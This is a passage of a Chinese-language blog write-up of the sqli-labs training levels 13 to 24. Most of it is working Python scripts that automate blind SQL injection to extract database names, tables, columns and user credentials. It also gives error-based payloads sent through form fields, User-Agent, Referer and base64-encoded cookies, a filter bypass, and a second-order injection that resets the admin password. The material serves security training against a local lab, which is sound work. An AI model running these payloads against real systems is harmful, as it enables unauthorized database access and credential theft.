        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):
                data1={
                'uname':"admin') and ascii(substr((select %s from users limit %d,1),%d,1))=%d#"%(columnname[j],i,pos+1,k),
                'passwd':'admin',
                'submit':'Submit'
}
                url='http://localhost/Less-13/index.php'
                text=requests.post(url,data1).text
                if 'flag' in text:
                    tem=tem+chr(k)
                    break
                else:
                    continue
        temdata.append(tem)
    data.append(temdata)
    print(temdata)
print("users数据数组为：",end='%s\n'%data)

Less-14 POST型双引号字符型盲注

# -*- coding: UTF-8 -*-
import requests
dblength=0
#爆破数据库名长度
while True:
    data={
    'uname':'admin" and length(database())=%d#'%dblength,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-14/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            data={
            'uname':'admin" and ascii(substr(database(),%d,1))=%d#'%(i+1,j),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-14/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    data={
    'uname':'admin" and (select count(table_name) from information_schema.tables where table_schema=database())=%d#'%tablenum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-14/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        data={
        'uname':'admin" and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#'%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-14/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("表的名称长度数组为:",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            data={
            'uname':'admin" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d#'%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-14/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    data={
    'uname':'admin" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=\'users\')=%d#'%(columnnum),
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-14/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        columnnum=columnnum+1
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        data={
        'uname':'admin" and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name=\'users\' limit %d,1),1))=%d#'%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-14/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            columnlength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            data={
            'uname':'admin" and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=\'users\' limit %d,1),%d,1))=%d#'%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-14/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    data={
    'uname':'admin" and (select count(*) from users)=%d#'%datanum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-14/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        datanum=datanum+1
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:
            data={
            'uname':'admin" and length(substr((select %s from users limit %d,1),1))=%d#'%(columnname[j],i,tem),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-14/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                break
            else:
                tem=tem+1
                continue
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):
                data1={
                'uname':'admin" and ascii(substr((select %s from users limit %d,1),%d,1))=%d#'%(columnname[j],i,pos+1,k),
                'passwd':'admin',
                'submit':'Submit'
}
                url='http://localhost/Less-14/index.php'
                text=requests.post(url,data1).text
                if 'flag' in text:
                    tem=tem+chr(k)
                    break
                else:
                    continue
        temdata.append(tem)
    data.append(temdata)
    print(temdata)
print("users数据数组为：",end='%s\n'%data)

Less-15 POST型单引号字符型盲注

# -*- coding: UTF-8 -*-
import requests
dblength=0
#爆破数据库名长度
while True:
    data={
    'uname':"admin' and length(database())=%d#"%dblength,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-15/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            data={
            'uname':"admin' and ascii(substr(database(),%d,1))=%d#"%(i+1,j),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-15/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    data={
    'uname':"admin' and (select count(table_name) from information_schema.tables where table_schema=database())=%d#"%tablenum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-15/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        data={
        'uname':"admin' and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#"%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-15/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue

print("表的名称长度数组为：",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            data={
            'uname':"admin' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d#"%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-15/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    data={
    'uname':"admin' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=%d#"%(columnnum),
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-15/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        columnnum=columnnum+1
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        data={
        'uname':"admin' and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %d,1),1))=%d#'"%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-15/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            columnlength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            data={
            'uname':"admin' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit %d,1),%d,1))=%d#"%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-15/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    data={
    'uname':"admin' and (select count(*) from users)=%d#"%datanum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-15/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        datanum=datanum+1
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:
            data={
            'uname':"admin' and length(substr((select %s from users limit %d,1),1))=%d#"%(columnname[j],i,tem),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-15/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                break
            else:
                tem=tem+1
                continue
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):
                data1={
                'uname':"admin' and ascii(substr((select %s from users limit %d,1),%d,1))=%d#"%(columnname[j],i,pos+1,k),
                'passwd':'admin',
                'submit':'Submit'
}
                url='http://localhost/Less-15/index.php'
                text=requests.post(url,data1).text
                if 'flag' in text:
                    tem=tem+chr(k)
                    break
                else:
                    continue
        temdata.append(tem)
    data.append(temdata)
    print(temdata)
print("users数据数组为：",end='%s\n'%data)

Less-16 POST型双引号单括号盲注

# -*- coding: UTF-8 -*-
import requests
dblength=0
#爆破数据库名长度
while True:
    data={
    'uname':'admin") and length(database())=%d#'%dblength,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-16/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        dblength=dblength+1
print("数据库长度为%d"%dblength)

#爆破数据库名
dbname=''
for i in range(dblength):
        for j in range(32,127):
            data={
            'uname':'admin") and ascii(substr(database(),%d,1))=%d#'%(i+1,j),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-16/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                dbname=dbname+chr(j)
                break
            else:
                continue
print("数据库名为%s"%dbname)

#爆破表数量
tablenum=0
while True:
    data={
    'uname':'admin") and (select count(table_name) from information_schema.tables where table_schema=database())=%d#'%tablenum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-16/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        tablenum=tablenum+1
print("表数量为%d"%tablenum)

#爆破表长度
tablelength=[]
for i in range(tablenum):
    temlength=0
    while True:
        data={
        'uname':'admin") and length(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),1))=%d#'%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-16/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            tablelength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("表的名称长度数组为:",end='%s\n'%tablelength)

#爆破表名
tablename=[]
for i in range(tablenum):
    temname=''
    for j in range(tablelength[i]):
        for k in range(32,127):
            data={
            'uname':'admin") and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d#'%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-16/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    tablename.append(temname)
print("表名数组为：",end='%s\n'%tablename)

#爆破users表的字段数量
columnnum=0
while True:
    data={
    'uname':'admin") and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=\'users\')=%d#'%(columnnum),
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-16/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        columnnum=columnnum+1
print("users字段数量:%d"%columnnum)

#爆破users表字段长度
columnlength=[]
for i in range(columnnum):
    temlength=0
    while True:
        data={
        'uname':'admin") and length(substr((select column_name from information_schema.columns where table_schema=database() and table_name=\'users\' limit %d,1),1))=%d#'%(i,temlength),
        'passwd':'admin',
        'submit':'Submit'
}
        url='http://localhost/Less-16/index.php'
        text=requests.post(url,data).text
        if 'flag' in text:
            columnlength.append(temlength)
            break
        else:
            temlength=temlength+1
            continue
print("users表字段长度数组:",end='%s\n'%columnlength)

#爆破users表字段名
columnname=[]
for i in range(columnnum):
    temname=''
    for j in range(columnlength[i]):
        for k in range(32,127):
            data={
            'uname':'admin") and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name=\'users\' limit %d,1),%d,1))=%d#'%(i,j+1,k),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-16/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                temname=temname+chr(k)
                break
            else:
                continue
    columnname.append(temname)
print("users字段数组为：",end='%s\n'%columnname)

#爆破users表的数据数量
datanum=0
while True:
    data={
    'uname':'admin") and (select count(*) from users)=%d#'%datanum,
    'passwd':'admin',
    'submit':'Submit'
}
    url='http://localhost/Less-16/index.php'
    text=requests.post(url,data).text
    if 'flag' in text:
        break
    else:
        datanum=datanum+1
print("users表数据数量为%d"%datanum)

#爆破所有数据长度
datalength=[]
for i in range(datanum):        #每组数据
    temlength=[]
    for j in range(columnnum):  #每个字段
        tem=0
        while True:
            data={
            'uname':'admin") and length(substr((select %s from users limit %d,1),1))=%d#'%(columnname[j],i,tem),
            'passwd':'admin',
            'submit':'Submit'
}
            url='http://localhost/Less-16/index.php'
            text=requests.post(url,data).text
            if 'flag' in text:
                break
            else:
                tem=tem+1
                continue
        temlength.append(tem)
    datalength.append(temlength)
print("users数据长度数组为：",end='%s\n'%datalength)

#爆破数据
data=[]
for i in range(datanum):        #每组数据
    temdata=[]
    for j in range(columnnum):  #每个字段
        tem=''
        for  pos in range(datalength[i][j]):    #每个位置
            for k in range(32,127):
                data1={
                'uname':'admin") and ascii(substr((select %s from users limit %d,1),%d,1))=%d#'%(columnname[j],i,pos+1,k),
                'passwd':'admin',
                'submit':'Submit'
}
                url='http://localhost/Less-16/index.php'
                text=requests.post(url,data1).text
                if 'flag' in text:
                    tem=tem+chr(k)
                    break
                else:
                    continue
        temdata.append(tem)
    data.append(temdata)
    print(temdata)
print("users数据数组为：",end='%s\n'%data)

Less-17 update注入

#判断是否存在注入
uname=admin&passwd=admin&submit=Submit 访问成功回显修改成功
uname=admin'&passwd=admin&submit=Submit 访问成功回显修改失败
uname=admin&passwd=admin'&submit=Submit 语法报错，应该是存在注入

#判断注入类型
uname=admin&passwd=admin'%23&submit=Submit 访问成功回显修改成功，基本确定是单引号闭合的字符型注入

#查询数据库
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database()))) %23&submit=Submit

#查询表名
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) %23&submit=Submit

#查询列名
uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) %23&submit=Submit

#查询数据
因为普通的报错无法利用update注入来查询数据，这里只能使用双查询，而且还只能一个字段一个字段的查，可以考虑写脚本实现查询
uname=admin&passwd=' and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1&submit=Submit

Less-18 HTTP请求头之User-Agent注入

这里借助User-Agent请求头

#判断是否存在注入
123 访问正常有回显
123' 语法报错，基本确定存在注入

#查询数据库名
123' and extractvalue(1,concat(0x7e,(select database()))) and '1

#查询表名
123' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '1

#查询列名
123' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '1

#查询数据(回显32位长度，多次查询即可)
123' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users))) and '1

Less-19 HTTP请求头之Referer注入

#判断是否存在注入
123 访问正常有回显
123' 语法报错，基本确定存在注入

#查询数据库名
123' and extractvalue(1,concat(0x7e,(select database()))) and '1

#查询表名
123' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '1

#查询列名
123' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '1

#查询数据(回显32位长度，多次查询即可)
123' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users))) and '1

Less-20 HTTP请求头之cookie注入

#判断是否存在注入
123 访问正常有回显
123' 语法报错，基本确定存在注入

#查询数据库名
123' and extractvalue(1,concat(0x7e,(select database()))) and '1

#查询表名
123' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '1

#查询列名
123' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and '1

#查询数据(回显32位长度，多次查询即可)
123' and extractvalue(1,concat(0x7e,(select group_concat(username,password) from users))) and '1

Less-21 HTTP请求头cookie字段base64注入单引号闭合

登录发现cookie字段有一段base64编码，解码为admin,于是尝试注入（其实和20关差不多，就是做一下base64即可

# 查询数据库
MTIzJyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpIGFuZCAnMQ==

# 查询表名
MTIzJyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSkpIGFuZCAnMQ==

# 查询列名
MTIzJyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnKSkpIGFuZCAnMQ==

#查询数据
MTIzJyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpKSkgYW5kICcx

Less-22 HTTP请求头cookie字段base64注入双引号闭合

探测了一下是双引号闭合，cookie字段base64传参，和前两关差别不大，直接给出payload

#查询数据库名
MTIzIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpIGFuZCAiMQ==

#查询表名
MTIzIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSkpIGFuZCAiMQ==

#查询列名
MTIzIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnKSkpIGFuZCAiMQ==

#查询数据
MTIzIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpKSkgYW5kICIx

Less-23 绕过对于注释符的waf(#、–+)

# 判断是否存在注入及注入类型
http://localhost/Less-23/?id=1 访问正常有回显
http://localhost/Less-23/?id=1' 语法报错
http://localhost/Less-23/?id=1' and '1'='1 访问正常有回显
http://localhost/Less-23/?id=1' and '1'='2 访问正常无回显，基本确定为单引号闭合字符型注入

# 判断waf
http://localhost/Less-23/?id=1' or '1'='1'# 语法报错
http://localhost/Less-23/?id=1' or '1'='1' 语法报错
http://localhost/Less-23/?id=1' or '1'='1# 访问正常有回显，说明#被过滤掉了，试了一下--+同样被过滤了

可以尝试报错注入并通过最后构造一个 and ‘来闭合语句

# 注数据库
http://localhost/Less-23/?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),0) and '1

# 注表名
http://localhost/Less-23/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),0) and '1

# 注列名
http://localhost/Less-23/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),0) and '1

# 注数据(一次32位，可以多次注入)
http://localhost/Less-23/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),0) and '1

Less-24 二次排序注入

二次排序注入也成为存储型注入，先将可以造成注入的字符存入数据库，再次进行注入时即可导致攻击

首先注册用户 admin’# 密码123
登录成功后，有一个修改密码的界面，我们猜测更改密码的语句是这样写的

update set new_password='newpass' where username='' and old_password='';

填入我们的用户名后变为

update set new_password='newpass' where username='admin'#' and old_password='';

可以看到后面语句都被注释掉了，所以造成了注入攻击，可以进行任意密码重置
于是我们输入将admin’#的密码修改为123，尝试登录admin 123, 发现登录成功，确定造成注入

未完待续

本文作者： yd0ng
本文链接： https://yd0ng.github.io/2020/02/01/sqli-labs-WriteUps/
版权声明： 本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。转载请注明出处！

赏

谢谢您的打赏，大家一起加油喔~

支付宝

微信